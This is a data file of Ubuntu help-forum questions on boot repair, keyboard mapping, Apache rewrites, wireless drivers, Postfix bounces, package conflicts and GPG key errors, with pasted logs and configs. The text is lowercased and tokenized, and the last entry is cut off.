411455	unable to install boot repair using ubuntu live usb	i 'm installing ubuntu 13.04 ( 16 bit ) along with windows 7 in my lenovo thinkpad . i was able to install ubuntu successfully . but , after installation it asked me to restart now . i clicked on it . it started windows without showing boot menu . now , what should i do to get the boot menu at the start . this are the steps i tried and was not successful : 1 . after browsing i found that boot repair has to be installed . i successfully used a ubuntu live cd and tried to install the boot repair . i tried the following commands - sudo add-apt-repository ppa : yannubuntu/boot-repair & & sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) but , i get this error now , dpkg : error : reading package into file '/var/lib/dpkg/available ' : input/output error e : subprocess /usr/bin/dpkg returned an error code ( 2 ) how can i solve this problem to get a boot menu at the beginning .
411456	unable to add mappings to 3rd level via xmodmap	i am trying to customize my keyboard layout using xmodmap under ubuntu 10.04 ( gnome ) . i am able to change mappings of keys that have some function in the original layout ( dvorak-ucw ) , e.g . i can change the mapping of rightalt+d from `` ď '' to whatever i want , but i ca n't add `` new '' keys to the 3rd level , e.g . change the mapping of rightalt+q from `` nothing '' to a new letter . the new mapping seems ok in the output of xmodmap -pke , but pressing the key works the same as pressing it without rightalt . does anyone know how to get around this ?
411458	clean url not working with apache on ubuntu 12.04	i have installed apache server in my system my directory structure is /etc/apache2/ i am using plain mvc architecture i have configure my .htaccess file like this rewriteengine on rewritecond % { request_filename } ! -f rewritecond % { request_filename } ! -d rewriterule ^ ( . * ) $ index.php ? rt= $ 1 [ l , qsa ] only the index controller is working . other than that , it 's showing url not found on this server server at localhost port 80 running on ubuntu 12.04 .
411459	remote installation . what is he doing ?	i give access to a company to remotely install ubuntu for me . is there a way to monitor/see that what is he doing now ?
411461	what happens after upgrading 13.10 to 14.04	i 'm planning to update to ubuntu 14.04 alpha builds using the in-place upgrade method . however , when installing ubuntu 13.10 i set the grub installation to ubuntu partition so that my pc originally boots to windows but i can select ubuntu in my bios boot options . so , if i do an in-place upgrade will grub will install to whole hard disk ( meaning that windows and ubuntu will be chain-loaded by grub ) and i will be greeted by grub instead of straight booting to windows . i need some advice . thanks for reading ! ! ! !
411462	show recent modified/created files using terminal	is there any command to display the recently modified/created files ? which one ... ?
411466	how to host a website using ubuntu 13.04 on my local machine	how do i do a complete bind9 dns server configuration with a hostname ? thank you so much for this wonderful answer . although the talk here had been more on the lines of setting up a home based server to be used locally . it will be helpful if anyone can list out changes required if i want to host a website globally , so anyone anywhere can open it . thanks for all the help the community provides : )
411469	wireless in 13.10 or similars does n't work !	just installed ubuntu 13.10 , i tried to connect wireless but it did n't detect any network . this is what happens when i check my wireless : : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes 1 : asus-wlan : wireless lan soft blocked : no hard blocked : no i 've tried with the command : -rfkill unblock 0 but i guess is only for soft blocks , because do n't works after reboot ... how could i fix it this ? i let you check the information about my network card and kernel . the version of ubuntu is in spanish , sorry . : ~ $ sudo lshw -c network [ sudo ] password for : *-network desactivado descripción : interfaz inalámbrica producto : ar9485 wireless network adapter fabricante : qualcomm atheros id físico : 0 información del bus : pci @ 0000:03:00.0 nombre lógico : wlan0 versión : 01 serie : 24:0a:64:14:77 : bf anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuración : broadcast=yes driver=ath9k driverversion=3.11.0-15-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn recursos : irq:17 memoria : f7900000-f797ffff memoria : f7980000-f798ffff *-network descripción : ethernet interface producto : rtl8111/8168/8411 pci express gigabit ethernet controller fabricante : realtek semiconductor co. , ltd. id físico : 0.2 información del bus : pci @ 0000:04:00.2 nombre lógico : eth0 versión : 0a serie : ac:22:0b:09:91 : b2 tamaño : 100mbit/s capacidad : 1gbit/s anchura : 64 bits reloj : 33mhz capacidades : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuración : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8411-1_0.0.3 06/18/12 ip=192.168.1.106 latency=0 link=yes multicast=yes port=mii speed=100mbit/s recursos : irq:45 ioport : d000 ( size=256 ) memoria : f2104000-f2104fff memoria : f2100000-f2103fff furthermore i want to say that this same problem happened with the last versions of linux mint ( 15 and 16 ) . p.s : i 've looked everywhere on this forum but i have n't found solution .
411472	how can i change unity sidebar to bottom ?	how can i make changes to my sidebars to bottom , and the theme etc . thank you
411473	ubuntu 12.04 keeps changing the display settings . dual monitor	i have an alienware m17xr4 with radeon hd 7970m , driver installed is vesa : wimbledon . i usually use my notebook at home or at work ... at work i have the possibility to use a dual monitor setting , to profit from a better view of code , optimizing a little bit the work . so 1 monitor at home , 2 monitors at work . when the settings are in 1 monitor only , everything works fine . but , when i plug the other one , the `` phantom '' things starts ... haha . my ubuntu did n't keep the configurations i set in ~/.config/monitors.xml , i have always to change this file , and run `` > sudo amdcccle '' to configure and re-configure . now , the `` phantom '' things , it did n't keep the settings , sometimes it works , sometimes do n't . sometimes , after 1 minute or less ( without any input from me , keyboard , mouse , etc ... ) , the settings changes , and goes back or to a clone display , or to 1 display only , or the position changes ( the external goes from left to right ) . when it happens , i check the monitors.xml file and there is a lot of configurations , which i deleted when i first check at the beginning . so , i wonder if there is a bash file that triggers it . thank you in advance . ask for some logs , i do n't know a lot of ubuntu to provide the right log data right now . edit 1 : uploaded video of the problem , see what 's happening : http : //www.youtube.com/watch ? v=p1bjlal5eko after recorded , i noticed that the settings changes every 30 seconds without any input . xrandr output : screen 0 : minimum 320 x 200 , current 3200 x 1080 , maximum 3200 x 3200 lvds connected 1920x1080+1280+0 ( normal left inverted right x axis y axis ) 382mm x 215mm 1920x1080 60.0*+ 1680x1050 60.0 1400x1050 60.0 1600x900 60.0 1280x1024 60.0 1440x900 60.0 1280x960 60.0 1280x768 60.0 1280x720 60.0 1024x768 60.0 1024x600 60.0 800x600 60.0 800x480 60.0 640x480 60.0 dfp1 disconnected ( normal left inverted right x axis y axis ) dfp2 disconnected ( normal left inverted right x axis y axis ) dfp3 disconnected ( normal left inverted right x axis y axis ) dfp4 disconnected ( normal left inverted right x axis y axis ) dfp5 disconnected ( normal left inverted right x axis y axis ) dfp6 disconnected ( normal left inverted right x axis y axis ) crt1 connected 1280x1024+0+0 ( normal left inverted right x axis y axis ) 338mm x 270mm 1280x1024 60.0 + 75.0* 1280x960 60.0 1152x864 75.0 60.0 1280x768 60.0 1280x720 60.0 1024x768 75.0 70.1 60.0 1024x600 75.0 70.1 60.0 800x600 72.2 75.0 60.3 56.2 800x480 72.2 75.0 60.3 56.2 640x480 75.0 72.8 67.0 59.9 file : ~/.config/monitors.xml ( the what i want settings ) < monitors version= '' 1 '' > < configuration > < clone > no < /clone > < output name= '' lvds '' > < vendor > lgd < /vendor > < product > 0x02da < /product > < serial > 0x00000000 < /serial > < width > 1920 < /width > < height > 1080 < /height > < rate > 60 < /rate > < x > 1280 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > yes < /primary > < /output > < output name= '' dfp1 '' > < /output > < output name= '' dfp2 '' > < /output > < output name= '' dfp3 '' > < /output > < output name= '' dfp4 '' > < /output > < output name= '' dfp5 '' > < /output > < output name= '' dfp6 '' > < /output > < output name= '' crt1 '' > < vendor > sqm < /vendor > < product > 0x01b7 < /product > < serial > 0x48413137 < /serial > < width > 1280 < /width > < height > 1024 < /height > < rate > 60 < /rate > < x > 0 < /x > < y > 0 < /y > < rotation > normal < /rotation > < reflect_x > no < /reflect_x > < reflect_y > no < /reflect_y > < primary > no < /primary > < /output > < /configuration > < /monitors >
411474	550 action not taken ( in reply to end of data command ) )	i got this when i check my postfix logs everything was alright i didnt make any changes in my server just some iptables now when i send an text email everything is ok and the status of email is sent the problem when i send an email with any hyperlink my dsn=5.0.0 bounced 550 action not taken . postfix log error jan 26 15:58:31 mail postfix/smtp [ 2075 ] : d4b1024c21 : to= < stimpack47 @ aol.fr > , relay=mailin-02.mx.aol.com [ 64.12.137.162 ] :25 , delay=0.62 , delays=0.1/0.01/0.32/0.2 , dsn=5.0.0 , status=bounced ( host mailin-02.mx.aol.com [ 64.12.137.162 ] said : 550 action not taken ( in reply to end of data command ) ) jan 26 15:58:31 mail postfix/cleanup [ 2068 ] : 6da6c257fb : message-id= < 20140126205831.6da6c257fb @ mail.mediatoolsbox.us > here is my config of postfix alias_database = hash : /etc/aliases alias_maps = hash : /etc/aliases command_directory = /usr/sbin config_directory = /etc/postfix daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 header_checks = regexp : /etc/postfix/header_checks home_mailbox = maildir/ html_directory = no inet_protocols = all mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man milter_default_action = accept milter_protocol = 2 mydestination = $ myhostname , localhost. $ mydomain , localhost , $ mydomain mydomain = mydomain.co myhostname = mail.mydomain.co mynetworks = 127.0.0.0/8 , myip myorigin = $ mydomain newaliases_path = /usr/bin/newaliases.postfix non_smtpd_milters = $ smtpd_milters readme_directory = /usr/share/doc/postfix-2.6.6/readme_files sample_directory = /usr/share/doc/postfix-2.6.6/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtpd_banner = $ myhostname esmtp $ mail_name ( $ mail_version ) smtpd_milters = inet:127.0.0.1:8891 unknown_local_recipient_reject_code = 550 virtual_transport = dovecot master.cf output # ========================================================================== smtp inet n - n - - smtpd # submission inet n - n - - smtpd # -o smtpd_tls_security_level=encrypt # -o smtpd_sasl_auth_enable=yes # -o smtpd_client_restrictions=permit_sasl_authenticated , reject # -o milter_macro_daemon_name=originating # smtps inet n - n - - smtpd # -o smtpd_tls_wrappermode=yes # -o smtpd_sasl_auth_enable=yes # -o smtpd_client_restrictions=permit_sasl_authenticated , reject # -o milter_macro_daemon_name=originating # 628 inet n - n - - qmqpd pickup fifo n - n 60 1 pickup cleanup unix n - n - 0 cleanup qmgr fifo n - n 300 1 qmgr # qmgr fifo n - n 300 1 oqmgr tlsmgr unix - - n 1000 ? 1 tlsmgr rewrite unix - - n - - trivial-rewrite bounce unix - - n - 0 bounce defer unix - - n - 0 bounce trace unix - - n - 0 bounce verify unix - - n - 1 verify flush unix n - n 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - n - - smtp any suggestions ?
411475	intel wireless 7260 driver crashes , how do i work around it ?	i 'm having problems with the wifi on my xubuntu 13.10 and my new lenovo x240 laptop . sometimes the driver crashes . lspci|grep -i wi 03:00.0 network controller : intel corporation wireless 7260 ( rev 83 ) dmesg [ 7522.845255 ] warning : cpu : 1 pid : 842 at /build/buildd/linux-3.11.0/drivers/net/wireless/iwlwifi/mvm/phy-ctxt.c:208 iwl_mvm_phy_ctxt_add+0x44/0x80 [ iwlmvm ] ( ) [ 7522.845259 ] modules linked in : dm_crypt pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) joydev parport_pc ppdev rfcomm bnep bluetooth arc4 x86_pkg_temp_thermal coretemp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd binfmt_misc uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev snd_hda_codec_realtek snd_hda_codec_hdmi nls_iso8859_1 snd_hda_intel snd_hda_codec snd_hwdep ext2 microcode snd_pcm snd_page_alloc snd_seq_midi snd_seq_midi_event snd_rawmidi psmouse serio_raw iwlmvm mac80211 thinkpad_acpi snd_seq nvram snd_seq_device tpm_tis snd_timer iwlwifi snd cfg80211 lpc_ich mei_me mei soundcore lp parport mac_hid intel_smartconnect hid_generic usbhid hid i915 i2c_algo_bit drm_kms_helper e1000e drm ahci ptp libahci pps_core wmi video [ 7522.845364 ] cpu : 1 pid : 842 comm : networkmanager tainted : gf w o 3.11.0-15-generic # 23-ubuntu [ 7522.845368 ] hardware name : lenovo 20alcto1ww/20alcto1ww , bios giet62ww ( 2.12 ) 09/25/2013 [ 7522.845371 ] 0000000000000009 ffff880210751620 ffffffff816e7335 0000000000000000 [ 7522.845379 ] ffff880210751658 ffffffff81061dcd ffff88020c443b68 ffff88020c4437b0 [ 7522.845385 ] 0000000000000000 ffff88020c443b68 ffff88020c443b98 ffff880210751668 [ 7522.845392 ] call trace : [ 7522.845405 ] [ < ffffffff816e7335 > ] dump_stack+0x45/0x56 [ 7522.845415 ] [ < ffffffff81061dcd > ] warn_slowpath_common+0x7d/0xa0 [ 7522.845422 ] [ < ffffffff81061eaa > ] warn_slowpath_null+0x1a/0x20 [ 7522.845437 ] [ < ffffffffa03bb3a4 > ] iwl_mvm_phy_ctxt_add+0x44/0x80 [ iwlmvm ] [ 7522.845450 ] [ < ffffffffa03b79c7 > ] iwl_mvm_up+0x237/0x270 [ iwlmvm ] [ 7522.845463 ] [ < ffffffffa03b9917 > ] iwl_mvm_mac_start+0x37/0x220 [ iwlmvm ] [ 7522.845494 ] [ < ffffffffa030d00c > ] ieee80211_do_open+0x43c/0xd80 [ mac80211 ] [ 7522.845518 ] [ < ffffffffa030a90b > ] ? ieee80211_check_concurrent_iface+0x1b/0x1b0 [ mac80211 ] [ 7522.845544 ] [ < ffffffffa030d9b9 > ] ieee80211_open+0x69/0x70 [ mac80211 ] [ 7522.845551 ] [ < ffffffff815f2aef > ] __dev_open+0xbf/0x140 [ 7522.845557 ] [ < ffffffff815f2db2 > ] __dev_change_flags+0x92/0x170 [ 7522.845564 ] [ < ffffffff815f2f3d > ] dev_change_flags+0x1d/0x60 [ 7522.845570 ] [ < ffffffff81600412 > ] do_setlink+0x332/0x9f0 [ 7522.845579 ] [ < ffffffff81097355 > ] ? sched_clock_cpu+0xb5/0x100 [ 7522.845590 ] [ < ffffffff811d803f > ] ? __find_get_block+0xbf/0x230 [ 7522.845598 ] [ < ffffffff8137df52 > ] ? nla_parse+0x32/0xe0 [ 7522.845604 ] [ < ffffffff81601734 > ] rtnl_newlink+0x394/0x5e0 [ 7522.845613 ] [ < ffffffff81318aa4 > ] ? apparmor_capable+0x24/0x180 [ 7522.845621 ] [ < ffffffff815fe159 > ] rtnetlink_rcv_msg+0x99/0x260 [ 7522.845628 ] [ < ffffffff81190ba8 > ] ? __kmalloc_node_track_caller+0x58/0x1d0 [ 7522.845634 ] [ < ffffffff815e179e > ] ? __alloc_skb+0x7e/0x2b0 [ 7522.845642 ] [ < ffffffff815fe0c0 > ] ? rtnetlink_rcv+0x30/0x30 [ 7522.845648 ] [ < ffffffff8161c069 > ] netlink_rcv_skb+0xa9/0xc0 [ 7522.845655 ] [ < ffffffff815fe0b8 > ] rtnetlink_rcv+0x28/0x30 [ 7522.845660 ] [ < ffffffff8161b6bd > ] netlink_unicast+0xdd/0x190 [ 7522.845668 ] [ < ffffffff8136eaad > ] ? memcpy_fromiovec+0x4d/0x90 [ 7522.845673 ] [ < ffffffff8161ba6f > ] netlink_sendmsg+0x2ff/0x740 [ 7522.845682 ] [ < ffffffff8161878c > ] ? netlink_rcv_wake+0x3c/0x50 [ 7522.845687 ] [ < ffffffff81619aa5 > ] ? netlink_recvmsg+0x205/0x390 [ 7522.845695 ] [ < ffffffff815d92a9 > ] sock_sendmsg+0x99/0xd0 [ 7522.845701 ] [ < ffffffff815d9968 > ] ? sock_recvmsg+0xa8/0xe0 [ 7522.845747 ] [ < ffffffff81685e2c > ] ? unix_dgram_sendmsg+0x59c/0x600 [ 7522.845758 ] [ < ffffffff815d96e8 > ] ___sys_sendmsg+0x3b8/0x3d0 [ 7522.845791 ] [ < ffffffff815d987e > ] ? sysc_sendto+0x17e/0x1c0 [ 7522.845826 ] [ < ffffffff815da4e2 > ] __sys_sendmsg+0x42/0x80 [ 7522.845852 ] [ < ffffffff815da532 > ] sys_sendmsg+0x12/0x20 [ 7522.845878 ] [ < ffffffff816f721d > ] system_call_fastpath+0x1a/0x1f sometimes i just get errors [ 7581.808662 ] iwlwifi 0000:03:00.0 : microcode sw error detected . restarting 0x2000000 . [ 7581.808674 ] iwlwifi 0000:03:00.0 : csr values : [ 7581.808679 ] iwlwifi 0000:03:00.0 : ( 2nd byte of csr_int_coalescing is csr_int_periodic_reg ) [ 7581.808782 ] iwlwifi 0000:03:00.0 : csr_hw_if_config_reg : 0x00489204 [ 7581.808840 ] iwlwifi 0000:03:00.0 : csr_int_coalescing : 0x00000040 [ 7581.808897 ] iwlwifi 0000:03:00.0 : csr_int : 0x00000000 [ 7581.808953 ] iwlwifi 0000:03:00.0 : csr_int_mask : 0x00000000 [ 7581.809010 ] iwlwifi 0000:03:00.0 : csr_fh_int_status : 0x00000000 [ 7581.809066 ] iwlwifi 0000:03:00.0 : csr_gpio_in : 0x00000000 [ 7581.809121 ] iwlwifi 0000:03:00.0 : csr_reset : 0x00000000 [ 7581.809176 ] iwlwifi 0000:03:00.0 : csr_gp_cntrl : 0x080403c5 [ 7581.809233 ] iwlwifi 0000:03:00.0 : csr_hw_rev : 0x00000144 [ 7581.809289 ] iwlwifi 0000:03:00.0 : csr_eeprom_reg : 0x00000000 [ 7581.809344 ] iwlwifi 0000:03:00.0 : csr_eeprom_gp : 0x80000000 [ 7581.809400 ] iwlwifi 0000:03:00.0 : csr_otp_gp_reg : 0x803a0000 [ 7581.809456 ] iwlwifi 0000:03:00.0 : csr_gio_reg : 0x00080042 [ 7581.809534 ] iwlwifi 0000:03:00.0 : csr_gp_ucode_reg : 0x00000000 [ 7581.809684 ] iwlwifi 0000:03:00.0 : csr_gp_driver_reg : 0x00000000 [ 7581.809743 ] iwlwifi 0000:03:00.0 : csr_ucode_drv_gp1 : 0x00000000 [ 7581.809894 ] iwlwifi 0000:03:00.0 : csr_ucode_drv_gp2 : 0x00000000 [ 7581.809953 ] iwlwifi 0000:03:00.0 : csr_led_reg : 0x00000060 [ 7581.810013 ] iwlwifi 0000:03:00.0 : csr_dram_int_tbl_reg : 0x88211595 [ 7581.810164 ] iwlwifi 0000:03:00.0 : csr_gio_chicken_bits : 0x27800200 [ 7581.810223 ] iwlwifi 0000:03:00.0 : csr_ana_pll_cfg : 0xd55555d5 [ 7581.810375 ] iwlwifi 0000:03:00.0 : csr_hw_rev_wa_reg : 0x0001001a [ 7581.810526 ] iwlwifi 0000:03:00.0 : csr_dbg_hpet_mem_reg : 0xffff0010 [ 7581.810533 ] iwlwifi 0000:03:00.0 : fh register values : [ 7581.810694 ] iwlwifi 0000:03:00.0 : fh_rscsr_chnl0_stts_wptr_reg : 0x2118f900 [ 7581.810762 ] iwlwifi 0000:03:00.0 : fh_rscsr_chnl0_rbdcb_base_reg : 0x02118f80 [ 7581.810831 ] iwlwifi 0000:03:00.0 : fh_rscsr_chnl0_wptr : 0x000000f0 [ 7581.810900 ] iwlwifi 0000:03:00.0 : fh_mem_rcsr_chnl0_config_reg : 0x00801114 [ 7581.810968 ] iwlwifi 0000:03:00.0 : fh_mem_rssr_shared_ctrl_reg : 0x000000fc [ 7581.811033 ] iwlwifi 0000:03:00.0 : fh_mem_rssr_rx_status_reg : 0x03230000 [ 7581.811099 ] iwlwifi 0000:03:00.0 : fh_mem_rssr_rx_enable_err_irq2drv : 0x00000000 [ 7581.811165 ] iwlwifi 0000:03:00.0 : fh_tssr_tx_status_reg : 0x07ff0001 [ 7581.811231 ] iwlwifi 0000:03:00.0 : fh_tssr_tx_error_reg : 0x00000000 [ 7581.811394 ] iwlwifi 0000:03:00.0 : start iwl error log dump : [ 7581.811399 ] iwlwifi 0000:03:00.0 : status : 0x00000000 , count : 6 [ 7581.811404 ] iwlwifi 0000:03:00.0 : 0x0000003c | nmi_interrupt_data_action_pt [ 7581.811407 ] iwlwifi 0000:03:00.0 : 0x00000230 | upc [ 7581.811411 ] iwlwifi 0000:03:00.0 : 0x00000000 | branchlink1 [ 7581.811415 ] iwlwifi 0000:03:00.0 : 0x00000c8a | branchlink2 [ 7581.811418 ] iwlwifi 0000:03:00.0 : 0x00014078 | interruptlink1 [ 7581.811422 ] iwlwifi 0000:03:00.0 : 0x00000676 | interruptlink2 [ 7581.811426 ] iwlwifi 0000:03:00.0 : 0x00000d40 | data1 [ 7581.811429 ] iwlwifi 0000:03:00.0 : 0x00000008 | data2 [ 7581.811433 ] iwlwifi 0000:03:00.0 : 0x03230000 | data3 [ 7581.811436 ] iwlwifi 0000:03:00.0 : 0x66418352 | beacon time [ 7581.811440 ] iwlwifi 0000:03:00.0 : 0x9c09287a | tsf low [ 7581.811444 ] iwlwifi 0000:03:00.0 : 0x00000023 | tsf hi [ 7581.811447 ] iwlwifi 0000:03:00.0 : 0x00000000 | time gp1 [ 7581.811451 ] iwlwifi 0000:03:00.0 : 0x03844afe | time gp2 [ 7581.811454 ] iwlwifi 0000:03:00.0 : 0x00000000 | time gp3 [ 7581.811458 ] iwlwifi 0000:03:00.0 : 0x00321600 | ucode version [ 7581.811462 ] iwlwifi 0000:03:00.0 : 0x00000144 | hw version [ 7581.811465 ] iwlwifi 0000:03:00.0 : 0x00489204 | board version [ 7581.811469 ] iwlwifi 0000:03:00.0 : 0x0000001c | hcmd [ 7581.811473 ] iwlwifi 0000:03:00.0 : 0xa6f62000 | isr0 [ 7581.811476 ] iwlwifi 0000:03:00.0 : 0x01004000 | isr1 [ 7581.811480 ] iwlwifi 0000:03:00.0 : 0x00000002 | isr2 [ 7581.811483 ] iwlwifi 0000:03:00.0 : 0x0041fc85 | isr3 [ 7581.811487 ] iwlwifi 0000:03:00.0 : 0x00000000 | isr4 [ 7581.811490 ] iwlwifi 0000:03:00.0 : 0x10000112 | isr_pref [ 7581.811494 ] iwlwifi 0000:03:00.0 : 0x00000d40 | wait_event [ 7581.811497 ] iwlwifi 0000:03:00.0 : 0x000000d0 | l2p_control [ 7581.811501 ] iwlwifi 0000:03:00.0 : 0x00010030 | l2p_duration [ 7581.811505 ] iwlwifi 0000:03:00.0 : 0x0000003f | l2p_mhvalid [ 7581.811508 ] iwlwifi 0000:03:00.0 : 0x000000ce | l2p_addr_match [ 7581.811512 ] iwlwifi 0000:03:00.0 : 0x00000007 | lmpm_pmg_sel [ 7581.811516 ] iwlwifi 0000:03:00.0 : 0x63e8869e | timestamp [ 7581.811519 ] iwlwifi 0000:03:00.0 : 0x0034f000 | flow_handler [ 7581.811526 ] ieee80211 phy0 : hardware restart was requested [ 7581.812863 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 7581.813342 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s i 'm using the latest xubuntu kernel 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 x86_64 x86_64 gnu/linux thanks for your help .
411476	error installing qt4 on ubuntu 11.10 arm	i 'm working on a nitrogren6x arm platform . they provide an image based on ubunu 11.10 . this works like expected and i do n't want to upgrade to some newer ubuntu version . we are trying to run some qt4 based software on the system , so i tried to install the qt4 libraries like this : apt-get install qt4-dev-tools libqt4-dev libqt4-core libqt4-gui this raises the following error : the following packages have unmet dependencies : libqt4-opengl-dev : depends : libgles2-mesa-dev or libgles2-dev calling 'apt-get -f install ' does n't help either , it stops somewhere here : do you want to continue [ y/n ] ? debconf : dbdriver `` config '' : could not open /var/cache/debconf/config.dat ( reading database ... 113844 files and directories currently installed . ) unpacking libegl1-mesa-dev ( from ... /libegl1-mesa-dev_7.11-0ubuntu3.2linaro1_armel.deb ) ... dpkg : error processing /var/cache/apt/archives/libegl1-mesa-dev_7.11-0ubuntu3.2linaro1_armel.deb ( -- unpack ) : trying to overwrite '/usr/include/khr/khrplatform.h ' , which is also in package gpu-viv-bin-mx6q 3.0.35 unpacking libgles2-mesa-dev ( from ... /libgles2-mesa-dev_7.11-0ubuntu3.2linaro1_armel.deb ) ... dpkg : error processing /var/cache/apt/archives/libgles2-mesa-dev_7.11-0ubuntu3.2linaro1_armel.deb ( -- unpack ) : trying to overwrite '/usr/include/gles2/gl2ext.h ' , which is also in package gpu-viv-bin-mx6q 3.0.35 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what can i do to solve this ? how do i even get back to a working apt-get system ?
411481	using ubuntu live cd how to mount my old backtrack install ?	i have an old install of backtrack 5 amd64 and yesterday i tried to upgrade it . for some reason that upgrade failed and i can not manage to get it working . so i now want to copy my data from some file locations to an external hard disk in order to perform afterwards a clean install with ubuntu . i booted a live usb with ubuntu and i am able to see the files within the file explorer . however some of the i can not copy i.e . do not have sufficient permissions . provided i know the root password of my original backtrack installation how can i mount it using this password from the ubuntu live cd so that i can do any file operations with granted permisions ? ? ? what i ve already done : booted the ubuntu live cd . pressed ctrl-alt-f1 sudo mount /dev/sda1 /mnt sudo chroot /mnt pressed ctrl-alt-f7 clicked on try ubuntu i can now copy some files but not all of them . thanks in advance !
411482	upgrading from 12.04 to 13.04	what are the easy and possible ways to upgrade the operating system from 12.04 to 13.04 ? are there any option except booting the system with 13.04 ?
411485	trying to install windows 7 next to ubuntu after ubuntu but i get gpt error	i want to install windows 7 home premium 64 bit after ubuntu 12.04 ( i already looked up how to set up grub and such ) but when i get to the partitioning part it tells me that windows ca n't be installed on the selected disk because the disk has a gpt partition style . opening gparted shows me the following partitions : /dev/sda1 - fat32 - /boot/efi - size 93 mb /dev/sda2 - linux-swap - size 9.54 gb /dev/sda3 - ext4 - / - size : 95.36 gb /dev/sda4 - ext4 - /home - size : 1.62tb i also have 100 gb of empty space where i want to install windows 7 pc hardware : motherboard : asus m5a97 r2 cpu : amd fx-6300 is there any way i can trick windows into thinking it 's installing on an mbr disk ? or can i convert my disk without loosing any data ? i know this is a long story and it 's complicated , tell me if i have to provide any extra information . thanks in advance
411486	how to save `` initctl '' log-priority options ?	i would like to save init log-prority debug options . what is the whole process from startup event ? however , the init log-priority option to reboot and reset to the message . what should i do ? if there is no way to modify the upstart source code what should i do ?
411488	`` gpg error '' while running `` sudo apt-fast update ''	one day i found out error messages as below , i do n't know what happened , what is a solution to check for fixing , and i need help from you . ... ... ... ... . err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found err http : //ppa.launchpad.net saucy/main i386 packages 404 not found ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en fetched 1,498 kb in 2min 56s ( 8,478 b/s ) reading package lists ... done w : gpg error : http : //dl.google.com stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 w : gpg error : http : //dl.google.com stable release : the following signatures could n't be verified because the public key is not available : no_pubkey a040830f7fac5991 w : gpg error : http : //www.geogebra.net stable inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey c072a32983a736cf w : gpg error : http : //deb.torproject.org saucy inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey 74a941ba219ec810 w : gpg error : http : //archive.canonical.com saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //extras.ubuntu.com saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey 16126d3a3e5c1192 w : gpg error : http : //archive.ubuntu.com saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com saucy-updates release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : http : //archive.ubuntu.com saucy-security release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : an error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //archive.ubuntu.com saucy-proposed release : the following signatures could n't be verified because the public key is not available : no_pubkey 40976eaf437d05b5 no_pubkey 3b4fe6acc0b21f32 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : https : //private-ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey e131728675254d99 w : gpg error : http : //ppa.launchpad.net saucy release : the following signatures could n't be verified because the public key is not available : no_pubkey 8fc2c0dc77296259 w : failed to fetch https : //ppa.launchpad.net/clamtk/dists/saucy/main/binary-amd64/packages w : failed to fetch https : //ppa.launchpad.net/clamtk/dists/saucy/main/binary-i386/packages w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/saucy-proposed/release w : failed to fetch http : //ppa.launchpad.net/birdie-team/stable/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/birdie-team/stable/ubuntu/dists/saucy/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/clicompanion-devs/clicompanion-nightlies/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : 